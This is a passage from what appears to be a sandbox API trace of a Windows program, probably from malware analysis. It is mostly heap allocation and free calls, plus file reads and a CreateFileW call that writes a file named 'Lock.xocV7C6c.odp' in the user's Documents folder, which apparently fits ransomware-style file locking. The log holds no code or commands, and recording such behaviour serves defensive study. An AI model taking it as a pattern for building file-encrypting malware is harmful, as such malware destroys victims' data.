(HeapHandle=0x2af0000, Flags=0x0, Size=0x10000) returned 0x2a7a130 [0221.945] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab068 [0221.945] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72268 [0221.945] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents/Lock.xocV7C6c.odp" (normalized: "c:\\users\\fd1hvy\\documents\\lock.xocv7c6c.odp"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4dc [0221.946] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f7140 [0221.946] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab050 | out: hHeap=0x2af0000) returned 1 [0221.946] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf48 | out: hHeap=0x2af0000) returned 1 [0221.946] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafc0 | out: hHeap=0x2af0000) returned 1 [0221.946] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae40 | out: hHeap=0x2af0000) returned 1 [0221.946] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72368 | out: hHeap=0x2af0000) returned 1 [0221.946] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf60 | out: hHeap=0x2af0000) returned 1 [0221.946] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0221.946] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab020 | out: hHeap=0x2af0000) returned 1 [0221.946] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0221.946] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72298 [0221.946] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0221.946] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb00 [0221.946] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0221.946] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb00 | out: hHeap=0x2af0000) returned 1 [0221.946] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0221.946] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e940 [0221.946] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0221.946] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72348 [0221.947] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf48 [0221.947] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae40 [0221.947] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72368 [0221.947] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72368 | out: hHeap=0x2af0000) returned 1 [0221.947] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab020 [0221.947] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72368 [0221.947] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf60 [0221.947] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafc0 [0221.947] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721a8 [0221.947] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab050 [0221.947] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721a8 | out: hHeap=0x2af0000) returned 1 [0221.947] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab050 | out: hHeap=0x2af0000) returned 1 [0221.947] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafc0 | out: hHeap=0x2af0000) returned 1 [0221.947] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf60 | out: hHeap=0x2af0000) returned 1 [0221.947] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722b8 [0221.947] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6ee0 [0221.947] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf60 [0221.947] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafc0 [0221.947] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72298 [0221.947] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab050 [0221.947] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0221.947] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab050 | out: hHeap=0x2af0000) returned 1 [0221.947] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafc0 | out: hHeap=0x2af0000) returned 1 [0221.947] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf60 | out: hHeap=0x2af0000) returned 1 [0221.947] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6ee0 | out: hHeap=0x2af0000) returned 1 [0221.948] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722b8 | out: hHeap=0x2af0000) returned 1 [0221.948] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72368 | out: hHeap=0x2af0000) returned 1 [0221.948] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf60 [0221.948] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab050 [0221.948] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72368 [0221.948] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x100000) returned 0x54e1020 [0221.950] SetFilePointerEx (in: hFile=0x50c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf4e4 | out: lpNewFilePointer=0x0) returned 1 [0221.950] ReadFile (in: hFile=0x50c, lpBuffer=0x3855010, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x3855010*, lpNumberOfBytesRead=0x8cf4f8*=0x7a39, lpOverlapped=0x0) returned 1 [0221.952] ReadFile (in: hFile=0x50c, lpBuffer=0x3855010, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x3855010*, lpNumberOfBytesRead=0x8cf4f8*=0x0, lpOverlapped=0x0) returned 1 [0221.952] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab050 | out: hHeap=0x2af0000) returned 1 [0221.952] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72368 | out: hHeap=0x2af0000) returned 1 [0221.952] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf60 | out: hHeap=0x2af0000) returned 1 [0221.952] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722d8 [0221.952] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x7a39) returned 0x2a8a138 [0221.953] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x54e1020 | out: hHeap=0x2af0000) returned 1 [0221.955] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae40 | out: hHeap=0x2af0000) returned 1 [0221.955] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab020 | out: hHeap=0x2af0000) returned 1 [0221.955] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf48 | out: hHeap=0x2af0000) returned 1 [0221.955] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0221.955] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaea0 | out: hHeap=0x2af0000) returned 1 [0221.955] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721f8 | out: hHeap=0x2af0000) returned 1 [0221.955] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaeb8 | out: hHeap=0x2af0000) returned 1 [0221.955] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722b8 [0221.955] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x7a39) returned 0x2a91b80 [0221.956] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a8a138 | out: hHeap=0x2af0000) returned 1 [0221.956] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722d8 | out: hHeap=0x2af0000) returned 1 [0221.956] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0221.956] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72298 [0221.956] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae40 [0221.956] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab020 [0221.956] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72398 [0221.956] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722a8 [0221.956] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x7a39) returned 0x2a8a138 [0221.956] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0221.956] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a8a138 | out: hHeap=0x2af0000) returned 1 [0221.993] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722a8 | out: hHeap=0x2af0000) returned 1 [0221.993] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab020 | out: hHeap=0x2af0000) returned 1 [0221.993] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae40 | out: hHeap=0x2af0000) returned 1 [0221.993] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0221.993] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0221.993] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72298 [0221.993] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72368 [0221.993] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7220 [0221.993] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7220 | out: hHeap=0x2af0000) returned 1 [0221.993] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72368 | out: hHeap=0x2af0000) returned 1 [0221.993] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0221.993] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e6c0 [0221.993] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0221.993] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721f8 [0221.993] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78458 [0221.993] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722d8 [0221.993] CharUpperBuffW (in: lpsz="A2600502813", cchLength=0xb | out: lpsz="A2600502813") returned 0xb [0221.993] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78458 | out: hHeap=0x2af0000) returned 1 [0221.994] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722d8 | out: hHeap=0x2af0000) returned 1 [0221.994] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae40 [0221.994] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72298 [0221.994] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaea0 [0221.994] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaeb8 [0221.994] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722a8 [0221.994] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72398 [0221.994] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x7a39) returned 0x2a8a138 [0221.994] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722a8 | out: hHeap=0x2af0000) returned 1 [0221.994] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a722d8 [0221.994] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf48 [0221.994] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722a8 [0221.994] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722a8 | out: hHeap=0x2af0000) returned 1 [0221.994] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a722a8 [0221.994] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf60 [0221.994] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72348 [0221.994] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0221.994] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72348 [0221.994] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafc0 [0221.994] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72368 [0221.994] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72368 | out: hHeap=0x2af0000) returned 1 [0221.994] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab020 [0221.994] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a783b8 [0221.995] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab050 [0221.995] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72368 [0221.995] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab050 | out: hHeap=0x2af0000) returned 1 [0221.995] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782c8 [0221.995] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab050 [0221.995] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721a8 [0221.995] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x7a39) returned 0x2a995c8 [0221.995] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78188 [0221.995] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab338 [0221.995] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72378 [0221.995] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab338 | out: hHeap=0x2af0000) returned 1 [0221.995] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ff8 [0221.995] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab338 [0221.995] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78368 [0221.996] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6f8 [0221.996] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72528 [0221.996] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6f8 | out: hHeap=0x2af0000) returned 1 [0221.996] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a783e0 [0221.996] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab500 [0221.996] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78408 [0221.996] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6f8 [0221.996] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a724f8 [0221.996] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6f8 | out: hHeap=0x2af0000) returned 1 [0221.996] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78250 [0221.996] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6f8 [0221.996] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de40 [0221.996] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0221.996] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72508 [0221.996] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72548 [0221.996] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab530 [0221.996] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab548 [0221.996] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72558 [0221.996] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab578 [0221.996] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72558 | out: hHeap=0x2af0000) returned 1 [0221.996] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72578 [0221.996] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78200 [0221.996] CharUpperBuffW (in: lpsz="SSA2600502813", cchLength=0xd | out: lpsz="SSA2600502813") returned 0xd [0221.996] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78200 | out: hHeap=0x2af0000) returned 1 [0221.996] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72578 | out: hHeap=0x2af0000) returned 1 [0221.996] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab578 | out: hHeap=0x2af0000) returned 1 [0221.996] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab548 | out: hHeap=0x2af0000) returned 1 [0221.997] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0221.997] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72548 | out: hHeap=0x2af0000) returned 1 [0221.997] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72508 | out: hHeap=0x2af0000) returned 1 [0221.997] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ed40 [0221.997] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0221.997] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ed40 | out: hHeap=0x2af0000) returned 1 [0221.997] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab710 [0221.997] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72508 [0221.997] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab710 | out: hHeap=0x2af0000) returned 1 [0221.997] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78318 [0221.997] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab710 [0221.997] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab440 [0221.997] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72548 [0221.997] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78070 [0221.997] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab530 [0221.997] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72558 [0221.997] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0221.997] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78110 [0221.997] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab530 [0221.997] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab548 [0221.997] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78318 | out: hHeap=0x2af0000) returned 1 [0221.998] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72508 | out: hHeap=0x2af0000) returned 1 [0221.998] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab710 | out: hHeap=0x2af0000) returned 1 [0221.998] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab578 [0221.998] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72508 [0221.998] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab578 | out: hHeap=0x2af0000) returned 1 [0221.998] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78430 [0221.998] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab710 [0221.998] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab578 [0221.998] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72578 [0221.998] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78098 [0221.998] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab968 [0221.998] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72708 [0221.998] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab968 | out: hHeap=0x2af0000) returned 1 [0221.998] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78160 [0221.998] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab8a8 [0221.998] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab998 [0221.998] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78430 | out: hHeap=0x2af0000) returned 1 [0221.998] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72508 | out: hHeap=0x2af0000) returned 1 [0221.998] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab710 | out: hHeap=0x2af0000) returned 1 [0221.999] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab710 [0221.999] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72508 [0221.999] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab710 | out: hHeap=0x2af0000) returned 1 [0221.999] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a780c0 [0221.999] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab710 [0222.000] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab980 [0222.000] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72718 [0222.000] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78318 [0222.000] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab860 [0222.000] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72698 [0222.000] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab860 | out: hHeap=0x2af0000) returned 1 [0222.000] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78390 [0222.000] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab788 [0222.000] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab938 [0222.000] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a780c0 | out: hHeap=0x2af0000) returned 1 [0222.000] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72508 | out: hHeap=0x2af0000) returned 1 [0222.000] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab710 | out: hHeap=0x2af0000) returned 1 [0222.000] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab710 [0222.000] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72508 [0222.000] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab710 | out: hHeap=0x2af0000) returned 1 [0222.000] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a780e8 [0222.000] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab710 [0222.000] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab950 [0222.000] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72778 [0222.000] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78340 [0222.000] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab7d0 [0222.000] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72628 [0222.000] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab7d0 | out: hHeap=0x2af0000) returned 1 [0222.000] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78138 [0222.000] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 